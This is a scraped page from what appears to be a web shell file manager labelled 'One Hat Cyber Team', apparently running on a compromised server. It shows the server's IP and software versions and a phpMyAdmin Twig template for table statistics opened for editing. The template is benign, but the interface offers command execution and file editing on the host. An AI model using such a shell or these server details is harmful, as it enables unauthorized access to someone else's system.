⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.172
Server IP:
13.200.189.69
Server:
Linux ip-172-31-46-210 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
phpmyadmin
/
templates
/
table
/
structure
/
Edit File: display_table_stats.twig
{% trans 'Information' %}
{% if showtable['TABLE_COMMENT'] %}
{% trans 'Table comments:' %}
{{ showtable['TABLE_COMMENT'] }}
{% endif %}
{% if not tbl_is_view and not db_is_system_schema %}
{% trans 'Space usage' %}
{% trans 'Data' %}
{{ data_size }}
{{ data_unit }}
{% if index_size is defined %}
{% trans 'Index' %}
{{ index_size }}
{{ index_unit }}
{% endif %} {% if free_size is defined %}
{% trans 'Overhead' %}
{{ free_size }}
{{ free_unit }}
{% trans 'Effective' %}
{{ effect_size }}
{{ effect_unit }}
{% endif %} {% if tot_size is defined and mergetable == false %}
{% trans 'Total' %}
{{ tot_size }}
{{ tot_unit }}
{% endif %} {# Optimize link if overhead #} {% if free_size is defined and (tbl_storage_engine == 'MYISAM' or tbl_storage_engine == 'ARIA' or tbl_storage_engine == 'MARIA' or tbl_storage_engine == 'BDB') %}
{{ Util_getIcon('b_tbloptimize', 'Optimize table'|trans) }}
{% endif %}
{% endif %} {% include 'table/structure/row_stats_table.twig' with { 'showtable': showtable, 'tbl_collation': tbl_collation, 'is_innodb': is_innodb, 'mergetable': mergetable, 'avg_size': avg_size is defined ? avg_size : null, 'avg_unit': avg_unit is defined ? avg_unit : null } only %}
Simpan